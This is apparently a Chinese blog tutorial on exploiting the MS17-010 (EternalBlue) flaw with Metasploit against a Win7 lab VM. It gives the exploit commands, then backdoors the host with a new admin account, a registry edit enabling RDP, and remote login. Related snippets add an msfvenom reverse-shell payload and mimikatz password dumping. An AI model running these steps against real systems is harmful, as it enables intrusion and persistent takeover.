永恒之蓝ms17-010漏洞利用(提取meterpreter权限获取shell,进入windows 远程操控主机)

最新推荐文章于 2024-07-22 01:51:44 发布
最新推荐文章于 2024-07-22 01:51:44 发布
阅读量1.2w 收藏 130
点赞数 22
分类专栏: 网络安全 文章标签: linux 安全漏洞 metasploit
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42527761/article/details/107453732
版权

文章目录

一、漏洞原理

1、永恒之蓝漏洞是方程式组织在其漏洞利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码。
2、SMB服务在Windows与UNIX系列OS之间搭起一座桥梁,让两者的资源可互通有无。
-----想了解SMB具体漏洞原理可以点击链接: NSA Eternalblue SMB 漏洞分析.

二、需要工具

1、windows系统(靶机)
我这里使用的是在虚拟机里新建的win7系统
2、kali linux系统(攻击机)
我这里使用的是kali2020版本

三、漏洞验证

1、进入win7的cmd里查看windows系统的IP地址为:192.168.60.137
宇宙小天才

2、打开kali—漏洞利用工具集—metasploit framework,双击进入在这里插入图片描述
3、等工具自己跑完后,成功进入msf,就可以敲命令啦
在这里插入图片描述

4、使用auxiliary/scanner/smb/smb_ms17_010模块(主要是为了扫描看目标靶机是否存在ms17-010漏洞)

msf5 > use auxiliary/scanner/smb/smb_ms17_010

5、查看auxiliary/scanner/smb/smb_ms17_010模块的配置信息

msf5 auxiliary(scanner/smb/smb_ms17_010) > show options

运行后会显示auxiliary/scanner/smb/smb_ms17_010模块的所有配置信息
在这里插入图片描述

6、在扫描模块里设置win7靶机的IP:192.168.60.137

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.60.137

运行后会自动返回rhost→192.168.60.137
在这里插入图片描述

7、设置完成后,模块对目标靶机进行扫描

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

显然,扫描并未显示出现ms17-010漏洞
在这里插入图片描述
这是因为防火墙给挡住了,接下来将防火墙关闭,在运行下试试
在这里插入图片描述
可以看到,把防火墙关闭后,重新扫描出了ms17-010漏洞,所以win7靶机存在“永恒之蓝”漏洞
在这里插入图片描述

四、漏洞攻击

1、搜索ms17-010漏洞利用模块

msf5 auxiliary(scanner/smb/smb_ms17_010) > search ms17-010

会显示所有ms17-010漏洞可以利用的模块信息
在这里插入图片描述
2、使用auxiliary(scanner/smb/smb_ms17_010)模块(进行攻击)

msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue

3、查看auxiliary(scanner/smb/smb_ms17_010)模块的配置信息

msf5 exploit(windows/smb/ms17_010_eternalblue) > show options

会显示auxiliary(scanner/smb/smb_ms17_010)模块的所有配置信息
在这里插入图片描述
4、接下来,在攻击模块里设置win7靶机的IP

msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.60.137

运行后会自动返回rhost→192.168.60.137
在这里插入图片描述
5、使用exploit或run命令进行攻击

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

运行结束后,获取到了meterpreter权限
在这里插入图片描述

6、在meterpreter权限中直接获取shell

meterpreter > shell

可以看到成功获取了win7的权限,可以进行操作了
在这里插入图片描述

五、漏洞利用

1、首先我们来创建用户

C:\Windows\system32>net user lfn 123456 /add

我们去靶机上看看,发现了我们新增的用户,但是如果没有管理员权限,是没有办法进行远程连接的,也就是说,我们没办法在kali上打开win7靶机的远程操作界面

2、给我们的用户增加管理员权限,让它可以有远程控制的权限

C:\Windows\system32>net localgroup administrators lfn /add

我们再去靶机上看看,发现了我们新增的用户,已经有了管理员权限,可以进行远程连接了
在这里插入图片描述

3、用kali把win7靶机远程桌面服务打开

C:\Windows\system32>REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

4、在kali终端,使用添加的管理员账户lfn进行远程桌面

root@kali:~# rdesktop 192.168.60.137:3389

会自动弹出win7的界面窗口
在这里插入图片描述
如果我们直接进行登陆的话,win7靶机那边就会掉线
在这里插入图片描述
而且进行远程连接时,必须要win7那边确认或者是win7默认不选择等待30秒才能建立连接
在这里插入图片描述
30秒后,win7靶机就会如下图所示,可以看到主机被kali远程执行
在这里插入图片描述
30秒后,kali界面就会如下图所示,可以看到win7靶机的界面,并且可以进行任意操作了

在这里插入图片描述

六、最后的话

最近在学习The-Hacker-Playbook-3这本书,书中介绍的红队的第一个核心工具:Metasploit 框架,尽管 Metasploit 框架从 2003 年开发的,但它现在仍然是一个非常棒的工具。有最初的开发者 H.D. Moore 和非常活跃的社区为它提供持续支持。这个社区的驱动的框架,拥有着所有最新的公开漏洞的利用、后渗透利用模块、辅助模块等等。对于红队项目,我们可以使用 Metasploit 通过MS17-010永恒之蓝漏洞危害内部系统,以获得我们的第一个内网 shell,或者我们可能使用 Metasploit 为我们的社会工程攻击生成一个 Meterpreter payload。当然也可以重新编译 Metasploit payload 绕过杀毒软件和网络监控。这是个人对永恒之蓝ms17-010漏洞利用的学习总结,分享给大家一起学习,也希望大家多给一些批评建议!我会虚心学习的!加油✌*

宇宙小天才
关注
专栏目录
[网络安全自学篇] 六十八.WannaCry勒索病毒复现及分析(二)MS17-010利用及病毒解析
杨秀璋的专栏
04-20 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了通过Python利用永恒之蓝漏洞加载WannaCry勒索病毒,并实现对Win7文件加密的过程,但过程较为复杂,为什么不直接利用永恒之蓝呢?所以,这篇文章将直接分享MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒进行实验复现,并详细讲解WannaCry勒索病毒的原理。基础性文章,希望对您有所帮助。
[网络安全自学篇] 六十七.WannaCry勒索病毒复现及分析(一)Python利用永恒之蓝及Win7勒索加密
热门推荐
杨秀璋的专栏
04-14 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的DC-1题目,通过信息收集、CMS漏洞搜索、Drupal漏洞利用Metasploit反弹shell、提权及数据库爆破获取flag。这篇文章将分享新知识,最近WannaRen勒索软件爆发(下图是安天的分析攻击流程),其名称和功能与WannaCry相似,所以接下来作者将连续分享WannaCry勒索病毒的复现及分析,希望这篇基础性文章对您有所帮助。
渗透攻击之ms14-064漏洞利用实验
wylululu的博客
01-07 8179
ms14-064简介 Microsoft Windows OLE远程代码执行漏洞,OLE(对象链接与嵌入)是一种允许应用程序共享数据和功能的技术,远程攻击者利用此漏洞通过构造的网站执行任意代码,影响Win95+IE3 –Win10+IE11全版本。 实验步骤: 第一步:打开已安装好的kaili虚拟机系统,显示界面: 第二步:单击打开metasploit framework或者点击左上角应用程序&...
MS17-010 漏洞利用
午夜安全
08-23 1184
MS17-010 漏洞利用 1.1 MS17-010说明 1.2 测试过程 1)扫描 使用Nessus扫描主机192.168.223.134,发现以下漏洞: 2)漏洞利用 攻击对象:192.168.223.134,kali:192.168.223.135 (1)进入MSF框架 (2)查询漏洞模块并使用 search ms17_010 use exploit/windows/smb/ms17_010_eternalblue show payloads (3)配置攻击
MS17-010漏洞复现+利用
最新发布
Nove1205的博客
07-22 1391
MS17-010漏洞复现+利用 文章内容仅供学习参考,若用于非法途径,触犯法律后果自负,本人概不负责!!!
中职网络安全2022国赛之MS12020漏洞扫描与利用(CVE-2012-0002)
Ba1_Ma0的博客
04-25 5638
简介 我做了一个简单的环境来复现这个漏洞,需要虚拟机环境的可以加我qq:3316735898,有什么不会的也可以问我 1.在MSF工具中用search命令搜索MS12020 RDP拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2012-10-16)提交 搜索漏洞模块: search ms12-020 时间为: 2012-03-16 2.在MSF工具中调用MS12020 RDP拒绝服务漏洞的辅助扫描模块,将调用此模块的命令作为Flag值提交 use 3.使用set命令设置目标IP,
中职网络安全2022国赛之MS15034漏洞扫描与利用(CVE-2015-1635)
Ba1_Ma0的博客
04-24 3685
简介 我做了一个简单的环境来复现这个漏洞,有什么不会的也可以问我 1.在MSF工具中用search命令搜索MS15034HTTP.SYS漏洞拒绝服务攻击模块,将回显结果中的漏洞披露时间作为Flag值(如:2015-10-16)提交 搜索漏洞模块: search ms15_034 但是没有时间,在cve官网查到了此漏洞的披露时间 2015-02-17 2.在MSF工具中调用MS15034HTTP.SYS漏洞的辅助扫描模块,将调用此模块的命令作为Fl
Metasploit 渗透测试框架的基本使用(扩展:利用永恒之蓝漏洞攻击WIN7靶机)
weixin_46035615的博客
04-14 4769
1.Metasploit 渗透测试框架介绍 2.Metasploitable2-Linux 靶机系统介绍 3.Metasploit 基本使用方法 4.实战-使用 msf 渗透攻击 Win7 主机远程执行命令 5.实战-使用 msf 扫描靶机上 mysql 服务的空密码
渗透测试 ( 3 ) --- Metasploit Framework ( MSF )
墨鱼菜鸡
07-11 4487
白嫖 Metasploit Pro 2022:https://zhuanlan.zhihu.com/p/449836479 白嫖 Metasploit Pro 2022:http://t.zoukankan.com/hxlinux-p-15787814.html 好东西之 metasploit pro:https://www.52pojie.cn/thr...
[系统安全] 二十七.WannaCry勒索病毒分析 (3)蠕虫传播机制解析及IDA和OD逆向
杨秀璋的专栏
03-06 6369
前文分享了MSF利用MS17-010漏洞进行反弹Shell,再上传勒索病毒,复现了WannaCry勒索病毒。这篇文章作者将继续分析WannaCry勒索病毒,主要通过IDA和OD逆向分析蠕虫传播部分,详细讲解蠕虫是如何感染传播的。同时,由于作者技术真的菜,只能叙述自己摸索的过程,如果存在错误或不足之处,还望告知。希望这篇基础性文章对您有所帮助~
ms15-051利用工具
02-04
MS15-051攻击者在本地登录并可以在内核模式下运行任意代码,最严重的漏洞可能允许特权提升。受影响软件windows2003/windows2008/windows2012/windows7/windows8.1
渗透攻击漏洞利用实验(ms08-067、samba漏洞利用,ms03-026漏洞利用并长期保持)
qq_20381661的专栏
04-10 4816
(一)对MS08_067漏洞渗透攻击 1.使用msfconsole启动Metasploit终端,进入后使用search命令,搜索该漏洞对应的模块: 2.启用这个攻击模块,查看信息,设置攻击载荷: 3.查看渗透攻击所需的配置选项: 4.根据具体情况配置渗透攻击各个选项,并查看设置后的情况: 5.使用exploit发起渗透攻击,获得shell并进行简单操作: (二)利用samba漏洞 1.使用seach命令搜索samba漏洞对应的模块: 2.启用usermap_s
meterpreter 使用 shell乱码问题解决方法
weixin_44257023的博客
03-04 1737
问题 我们使用msf框架反弹shell或者主动攻击成功是,控制终端meterpreter 使用 shell乱码问题解决方法,一般都是Windows系统的cmd乱码问题 问题如图: 解决方法: 在shell 终端中输入 chcp 65001 chcp 65001 使用之后如图: ...
kali meterpreter中mimikatz模块获取密码
子曰小玖的博客
04-30 2183
kali这方面不说了,meterpreter也略过, 做个关于mimikatz的笔记. mimikatz模块, 能获取对方机器的密码(包括哈希和明文). 渗透模块怎么进的也不说了, 方式太多, 我用的是ms17-010 进去meterpreter后getuid一下(其他这个也没多大用处,军哥说进入meterpreter模式下 大部分情况下是拥有 system权限,无需 get sy...
meterpreter下抓取windows系统明文密码实验
Feng_Blue_的博客
11-04 4696
虚拟机:kali | Win7 工具:msf 1.生成工具 msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.40.140 lport=55555 -f exe -o 233.exe 这里需要注意的是IP地址以及端口。 2.监听 启动msf,选择模块,配置信息,监听。 msf6 > use exploit/multi/handler set payload windows/x64/met...
利用ms17-010 远程执行漏洞渗透Win7,并留下后门
qq_40624810的博客
07-18 4422
一、环境准备 主机 kali :192.168.115.134 靶机win7x64:192.168.115.133 二、渗透 Metasploit 指令学习:https://blog.csdn.net/tan6600/article/details/46845793 这里利用的是win7的ms17-010 远程执行漏洞 先使用auxiliary/scanner/smb/smb_ms17...
渗透之——Metasploit-Meterpreter Shell信息收集相关的命令
冰河的专栏
01-06 1822
转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85944005 PS:以下所有的命令都是在Metasploit-Meterpreter Shell下执行的。 一、进程迁移 1、获取目标机正在运行的进程 ps 2.查看Meterpreter Shell的进程号 getpid 3.将Meterpreter Shell进程绑...
系统漏洞 - 永恒之蓝MS17_010
Stacey_4869的博客
10-10 851
本文仅作为学习,请勿用于非法用途!
如何使用metasploit利用ms17-010漏洞对模拟靶机进行攻击
06-09
MS17-010漏洞是指Windows SMB远程代码执行漏洞,可以通过Metasploit利用这个漏洞对目标系统进行攻击。下面是攻击步骤: 1. 打开Metasploit控制台,输入`msfconsole`命令启动。 2. 搜索MS17-010漏洞模块,输入命令`search ms17-010`。 3. 选择对应的漏洞模块,输入命令`use exploit/windows/smb/ms17_010_eternalblue`。 4. 设置目标IP地址,输入命令`set RHOSTS <目标IP地址>`。 5. 设置攻击机监听的IP地址和端口号,输入命令`set LHOST <攻击机IP地址>`和`set LPORT <监听端口号>`。 6. 运行漏洞模块,输入命令`exploit`。 7. 如果攻击成功,将会创建一个会话,可以通过命令`sessions`查看当前会话列表。 8. 输入命令`sessions -i <会话ID>`进入会话,这样就可以执行一些命令,例如`sysinfo`查看目标系统信息,`shell`获取一个交互式shell等。 需要注意的是,这是一种非常危险的行为,必须在合法的环境下使用,否则可能会对他人和自己造成严重的损失。建议在使用前仔细阅读Metasploit的文档和指南,并遵守相关法律法规。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值